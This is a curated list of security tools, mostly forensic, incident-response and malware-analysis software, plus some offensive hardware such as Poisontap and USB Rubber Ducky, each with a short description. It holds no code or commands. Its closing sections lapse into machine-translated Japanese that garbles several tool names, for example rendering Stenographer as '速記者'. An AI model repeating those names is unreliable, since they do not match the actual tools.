
Anonymity Tools

  • Freenet - Freenet is a peer-to-peer platform for censorship-resistant communication and publishing.
  • I2P - The Invisible Internet Project.
  • OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
  • Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
  • What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • Balbuzard - Malware analysis tool with reverse obfuscation.
  • binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
  • Cuckoo Modified API - Python API for Cuckoo Modified.
  • Cuckoo Modified - Fork of Cuckoo Sandbox with multiple improvements.
  • Cuckoo Sandbox - Online malware scanner.
  • de4dot - .NET deobfuscator and unpacker.
  • dnSpy - Tool to reverse engineer .NET assemblies.
  • [Dovehawk] (https://github.com/tylabs/dovehawk) - Dovehawk is a Zeek module that automatically imports MISP indicators and reports Sightings
  • DRAKVUF - Virtualization based agentless black-box binary analysis system.
  • Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
  • FireEye Labs Obfuscated String Solver (FLOSS) - Malware deobfuscator.
  • firmware.re - Firmware analyzier.
  • HaboMalHunter - Automated malware analysis tool for Linux ELF files.
  • Hybrid Analysis - Online malware scanner.
  • Immunity Debugger - Powerful way to write exploits and analyze malware.
  • Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
  • Malaice.io - Open source malware analyzer.
  • Malheur - Automated sandbox analysis of malware behavior.
  • Medusa - Open source, cross-platform interactive disassembler.
  • Metadefender - Online file and hash analyzer.
  • NoMoreXOR - Frequency analysis tool for trying to crack 256-bit XOR keys.
  • OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
  • PackerAttacker - Generic hidden code extractor for Windows malware.
  • PacketTotal - Online pcap file analyzer.
  • peda - Python Exploit Development Assistance for GDB.
  • plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
  • Radare2 - Open source, crossplatform reverse engineering framework.
  • Ragpicker - Malware analysis tool.
  • rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
  • Sandboxed Execution Environment - Framework for building sandboxed malware execution environments.
  • unXOR - Tool that guesses XOR keys using known plaintext attacks.
  • VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers.
  • VirusTotal - Online malware scanner.
  • Voltron - Extensible debugger UI toolkit written in Python.
  • WDK/WinDbg - Windows Driver Kit and WinDbg.
  • x64dbg - Open source x64/x32 debugger for windows.
  • xortool - Tool for guessing XOR keys.

Side-channel Tools

  • ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.

Forensic Tools

Memory Analysis

  • Evolve - Web interface for Volatility advanced memory forensics framework.
  • inVtero.net - Windows x64 memory analysis tool.
  • Linux Memory Extractor (LiME) - A Loadable Kernel Module (LKM) allowing for volatile memory extraction of Linux-based systems.
  • Memoryze - Memory forensics software.
  • Microsoft User Mode Process Dumping - Dumps any running Win32 processes memory image on the fly.
  • PMDump - Tool for dumping memory contents of a process without stopping the process.
  • Rekall - Open source tool and library for the extraction of digital artifacts from volatile memory, RAM, samples.
  • Responder PRO - Commercial memory analysis software.
  • Volatility - Advanced memory forensics framework.
  • VolatilityBot - Automation tool utilizing Volatility.
  • VolDiff - Malware Memory Footprint Analysis based on Volatility.
  • WindowsSCOPE - Commercial memory forensics software for Windows systems.

Memory Imaging Tools

  • Belkasoft Live RAM Capturer - A tiny free forensic tool to reliably extract the entire content of the computer’s volatile memory – even if protected by an active anti-debugging or anti-dumping system.
  • Linux Memory Grabber - A script for dumping Linux memory and creating Volatility profiles.
  • Magnet RAM Capture - Magnet RAM Capture is a free imaging tool designed to capture the physical memory of a suspect’s computer. Supports recent versions of Windows.
  • OSForensics - OSForensics can acquire live memory on 32bit and 64bit systems. A dump of an individual process’s memory space or physical memory dump can be done.

Incident Response

Honeypot Tools

Monitoring and IDS-IPS

  • AIEngine - Very advanced NIDS.
  • Elastic Stack - Also known as the ELK stack, the combination of Elasticsearch, Logstash, and Kibana, for monitoring and logging.
  • OSSEC - Open source HIDS.
  • Security Onion - Linux distro for monitoring.
  • Snort - Open source NIPS/NIDS.
  • SSHWATCH - SSH IPS.
  • Suricata - Open source NIPS/NIDS.

Physical Tools

  • LAN Turtle - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
  • PCILeech - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.
  • Poisontap - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
  • Proxmark3 - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.
  • USB Rubber Ducky - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
  • WiFi Pineapple - Wireless auditing and penetration testing platform.

Adversary Emulation

  • APTSimulator - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.
  • Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.
  • AutoTTP - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.
  • Blue Team Training Toolkit](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.
  • Caldera - an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge](ATT&CK™) project.
  • DumpsterFire - The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.
  • Metta - An information security preparedness tool to do adversarial simulation.
  • Network Flight Simulator - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.
  • Red Team Automation ](https://github.com/endgameinc/RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
  • RedHunt-OS - A virtual machine for adversary emulation and threat hunting.

All in one Incident Response Tools

  • Belkasoft Evidence Center - The toolkit will quickly extract digital evidence from multiple sources by analyzing hard drives, drive images, memory dumps, iOS, Blackberry and Android backups, UFED, JTAG and chip-off dumps.
  • CimSweep - CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows.
  • CIRTkit - CIRTKit is not just a collection of tools, but also a framework to aid in the ongoing unification of Incident Response and Forensics investigation processes.
  • Cyber Triage - Cyber Triage remotely collects and analyzes endpoint data to help determine if it is compromised. It’s agentless approach and focus on ease of use and automation allows companies to respond without major infrastructure changes and without a team of forensics experts. Its results are used to decide if the system should be erased or investigated further.
  • Digital Forensics Framework - DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface. DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigations and perform incident response.
  • Doorman - Doorman is an osquery fleet manager that allows remote management of osquery configurations retrieved by nodes. It takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.
  • Envdb - Envdb turns your production, dev, cloud, etc environments into a database cluster you can search using osquery as the foundation. It wraps the osquery process with a cluster node agent that can communicate back to a central location.
  • Falcon Orchestrator - Falcon Orchestrator by CrowdStrike is an extendable Windows-based application that provides workflow automation, case management and security response functionality.
  • GRR Rapid Response - GRR Rapid Response is an incident response framework focused on remote live forensics. It consists of a python agent client that is installed on target systems, and a python server infrastructure that can manage and talk to the agent.
  • Kolide Fleet - Kolide Fleet is a state of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.
  • Limacharlie - an endpoint security platform. It is itself a collection of small projects all working together, and gives you a cross-platform, Windows, OSX, Linux, Android and iOS, low-level environment allowing you to manage and push additional modules into memory to extend its functionality.
  • MIG - Mozilla Investigator, MIG, is a platform to perform investigative surgery on remote endpoints. It enables investigators to obtain information from large numbers of systems in parallel, thus accelerating investigation of incidents and day-to-day operations security.
  • MozDef - The Mozilla Defense Platform, MozDef, seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers.
  • nightHawk - the nightHawk Response Platform is an application built for asynchronus forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections.
  • Open Computer Forensics Architecture - Open Computer Forensics Architecture, OCFA, is another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data.
  • Osquery - with osquery you can easily ask questions about your Linux and OSX infrastructure. Whether your goal is intrusion detection, infrastructure reliability, or compliance, osquery gives you the ability to empower and inform a broad set of organizations within your company. Queries in the -incident-response pack - help you detect and respond to breaches.
  • Redline - provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.
  • The Sleuth Kit & Autopsy - The Sleuth Kit is a Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools which helps in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things.
  • TheHive - TheHive is a scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.
  • X-Ways Forensics - X-Ways is a forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis.
  • Zentral - combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.

Disk Image Creation Tools

  • AccessData FTK Imager - AccessData FTK Imager is a forensics tool whose main purpose is to preview recoverable data from a disk of any kind. FTK Imager can also acquire live memory and paging file on 32bit and 64bit systems.
  • Bitscout - Bitscout by Vitaly Kamluk helps you build your fully-trusted customizable LiveCD/LiveUSB image to be used for remote digital forensics, or perhaps any other task of your choice. It is meant to be transparent and monitorable by the owner of the system, forensically sound, customizable and compact.
  • GetData Forensic Imager - GetData Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats.
  • Guymager - Guymager is a free forensic imager for media acquisition on Linux.
  • Magnet ACQUIRE - ACQUIRE by Magnet Forensics allows various types of disk acquisitions to be performed on Windows, Linux, and OS X as well as mobile operating systems.

Evidence Collection Tools

  • Bulk_extractor - bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. Because of ignoring the file system structure, the program distinguishes itself in terms of speed and thoroughness.
  • Cold Disk Quick Response - uses a streamlined list of parsers to quickly analyze a forenisic image file, dd, E01, .vmdk, etc, and output nine reports.
  • Ir-rescue - -ir-rescue - is a Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
  • Live Response Collection - The Live Response collection by BriMor Labs is an automated tool that collects volatile data from Windows, OSX, and -nix based operating systems.

Incident Management Tools

  • Cortex XSOAR - Security orchestration tool. Formerly Demisto community edition. Offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations, like Active Directory, PagerDuty, Jira and much more.
  • CyberCPR - A community and commercial incident management tool with Need-to-Know built in to support GDPR compliance while handling sensitive incidents.
  • Cyphon - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.
  • FIR - Fast Incident Response, FIR, is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike.
  • RTIR - Request Tracker for Incident Response, RTIR, is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker.
  • SCOT - Sandia Cyber Omni Tracker, SCOT, is an Incident Response collaboration and knowledge capture tool focused on flexibility and ease of use. Our goal is to add value to the incident response process without burdening the user.
  • Threat_note - A lightweight investigation notebook that allows security researchers the ability to register and retrieve indicators related to their research.

Linux Forensics Distributions

  • ADIA - The Appliance for Digital Investigation and Analysis, ADIA, is a VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 32-bit and x86_64 versions are available.
  • CAINE - The Computer Aided Investigative Environment, CAINE, contains numerous tools that help investigators during their analysis, including forensic evidence collection.
  • CCF-VM - CyLR CDQR Forensics Virtual Machine, CCF-VM: An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
  • DEFT - The Digital Evidence & Forensics Toolkit, DEFT, is a Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit, DART, for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
  • NST - Network Security Toolkit - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
  • PALADIN - PALADIN is a modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
  • Security Onion - Security Onion is a special Linux distro aimed at network security monitoring featuring advanced analysis tools.
  • SIFT Workstation - The SANS Investigative Forensic Toolkit, SIFT, Workstation demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.

Linux Evidence Collection

  • FastIR Collector Linux - FastIR for Linux collects different artefacts on live Linux and records the results in csv files.

Log Analysis Tools

  • Logdissect - A CLI utility and Python API for analyzing log files and other data.
  • Lorg - a tool for advanced HTTPD logfile security analysis and forensics.

OSX Evidence Collection

  • Knockknock - Displays persistent items, scripts, commands, binaries, etc., that are set to execute automatically on OSX.
  • Mac_apt - macOS Artifact Parsing Tool - Plugin based forensics framework for quick mac triage that works on live machines, disk images or individual artifact files.
  • OSX Auditor - OSX Auditor is a free Mac OS X computer forensics tool.
  • OSX Collector - An OSX Auditor offshoot for live response.

Incident Response Playbooks

  • IR Workflow Gallery - Different generic incident response workflows, e.g. for malware outbreak, data theft, unauthorized access,... Every workflow constists of seven steps: prepare, detect, analyze, contain, eradicate, recover, post-incident handling.
  • IRM - Incident Response Methodologies by CERT Societe Generale.
  • PagerDuty Incident Response Documentation - Documents that describe parts of the PagerDuty Incident Response process. It provides information not only on preparing for an incident, but also what to do during and after.

Process Dump Tools

Sandboxing/reversing tools

  • Cuckoo - Open Source Highly configurable sandboxing tool.
  • Cuckoo-modified - Heavily modified Cuckoo fork developed by community.
  • Cuckoo-modified-api - A Python library to control a cuckoo-modified sandbox.
  • Hybrid-Analysis - Hybrid-Analysis is a free powerful online sandbox by Payload Security.
  • Malwr - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox.
  • Mastiff - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats.
  • Metadefender Cloud - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assesment of files.
  • Viper - Viper is a python based binary analysis and management framework, that works well with Cuckoo and YARA
  • Virustotal - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners.
  • Visualize_Logs - Open source. Visualization library and command line tools for logs.

Timeline tools

  • Highlighter - Free Tool available from Fire/Mandiant that will depict log/text file that can highlight areas on the graphic, that corresponded to a key word or phrase. Good for time lining an infection and what was done post compromise.
  • Morgue - A PHP Web app by Etsy for managing postmortems.
  • Plaso - a Python-based backend engine for the tool log2timeline.
  • Timesketch - open source tool for collaborative forensic timeline analysis.

Windows Evidence Collection

  • AChoir - Achoir is a framework/scripting tool to standardize and simplify the process of scripting live acquisition utilities for Windows.
  • Binaryforay - list of free tools for win forensics.
  • Crowd Response - Crowd Response by CrowdStrike is a lightweight Windows console application designed to aid in the gathering of system information for incident response and security engagements. It features numerous modules and output formats.
  • FastIR Collector - FastIR Collector is a tool that collects different artefacts on live Windows systems and records the results in csv files. With the analyses of these artefacts, an early compromise can be detected.
  • FECT - Fast Evidence Collector Toolkit, FECT, is a light incident response toolkit to collect evidences on a suspicious Windows computer. Basically it is intended to be used by non-tech savvy people working with a journeyman Incident Handler.
  • Fibratus - tool for exploration and tracing of the Windows kernel.
  • IREC - All-in-one IR Evidence Collector which captures RAM Image, $MFT, EventLogs, WMI Scripts, Registry Hives, System Restore Points and much more. It is FREE, lightning fast and easy to use.
  • IOC Finder - IOC Finder is a free tool from Mandiant for collecting host system data and reporting the presence of Indicators of Compromise. Support for Windows only.
  • LOKI - Loki is a free IR scanner for scanning endpoint with yara rules and other indicators.
  • Panorama - Fast incident overview on live Windows systems.
  • PowerForensics - Live disk forensics platform, using PowerShell.
  • PSRecon - PSRecon gathers data from a remote Windows host using PowerShell](v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
  • RegRipper - Regripper is an open source tool, written in Perl, for extracting/parsing information, keys, values, and data from the Registry and presenting it for analysis.
  • TRIAGE-IR - Triage-IR is a IR collector for Windows.

Other

  • BruteX Wordlists - Wordlist repo.
  • Cortex - Cortex allows you to analyze observables such as IP and email addresses, URLs, domain names, files or hashes one by one or in bulk mode using a Web interface. Analysts can also automate these operations using its REST API.
  • Crits - a web-based tool which combines an analytic engine with a cyber threat database .
  • Diffy - a DFIR tool developed by Netflix's SIRT that allows an investigator to quickly scope a compromise across cloud instances (Linux instances on AWS, currently) during an incident and efficiently triaging those instances for followup actions by showing differences against a baseline.
  • domfind - domfind is a Python DNS crawler for finding identical domain names under different TLDs.
  • Fenrir - Fenrir is a simple IOC scanner. It allows scanning any Linux/Unix/OSX system for IOCs in plain bash. Created by the creators of THOR and LOKI.
  • Fileintel - Pull intelligence per file hash.
  • fuzzbox - Multi-codec media fuzzing tool.
  • Google Hacking Master List
  • HELK - Threat Hunting platform.
  • Hindsight - Internet history forensics for Google Chrome/Chromium.
  • honggfuzz - Security orientated fuzzing tool.
  • Hostintel - Pull intelligence per host.
  • imagemounter - Command line utility and Python package to ease the (un)mounting of forensic disk images.
  • Kansa - Kansa is a modular incident response framework in Powershell.
  • Kayak Car Hacking Tool - Tool for Kayak car hacking.
  • melkor-android - Android fuzzing tool for ELF file formats.
  • Netzob - Multipurpose tool for reverse engineering, modeling, and fuzzing communciation protocols.
  • radamsa - 汎用ファジー化ツール。
  • RaQet - RaQetは、意図的に構築されたフォレンジックオペレーティングシステムで再起動されたリモートコンピュータ(クライアント)のディスクをトリアージできる、型破りなリモート集録およびトリアージツールです。
  • rastrea2r - Windows、Linux、OS XでYARAを使用してディスクとメモリをスキャンしてIOCを探すことができます。
  • ROPガジェット - ROPの悪用を支援するためのPythonベースのツール。
  • Shellen - インタラクティブなシェルコーディング環境。
  • sqhunter - osquery と Salt Open (SaltStack) をベースにした脅威ハンターで、osquery の tls プラグインを必要とせずにアドホックまたは分散クエリを発行できます。sqhunterを使用すると、開いているネットワークソケットを照会し、脅威インテリジェンスソースと照合することができます。
  • Stalk - 問題が発生したときに MySQL に関するフォレンジックデータを収集します。
  • 速記者 - 速記者は、すべてのパケットをディスクにすばやくスプールし、それらのパケットのサブセットへのシンプルで高速なアクセスを提供することを目的としたパケットキャプチャソリューションです。できるだけ多くの履歴を格納し、ディスク使用量を管理し、ディスク制限に達したときに削除します。インシデントの直前と最中にトラフィックをキャプチャするのに理想的で、すべてのネットワーク トラフィックを格納する明示的な必要はありません。
  • Sulley - ファジー エンジンとフレームワーク。
  • トレースルート-circl - トレースルート-circl は、CSIRT (または CERT) オペレーターのアクティビティーをサポートするための拡張トレースルートです。通常、CSIRT チームは受信した IP アドレスに基づいてインシデントを処理する必要があります。コンピュータ緊急レスポンスセンタールクセンブルクによって作成されました。
  • ズールー語 - インタラクティブファジーザー。

オープンソースツール

  • Legion - Legionはオープンソースで使いやすく、超拡張可能で半自動化されたネットワーク侵入テストツールで、情報システムの発見、偵察、活用を支援します。

ライセンス

ティッカー

この作品はクリエイティブ・コモンズ 表示 4.0 国際ライセンスの下でライセンスされています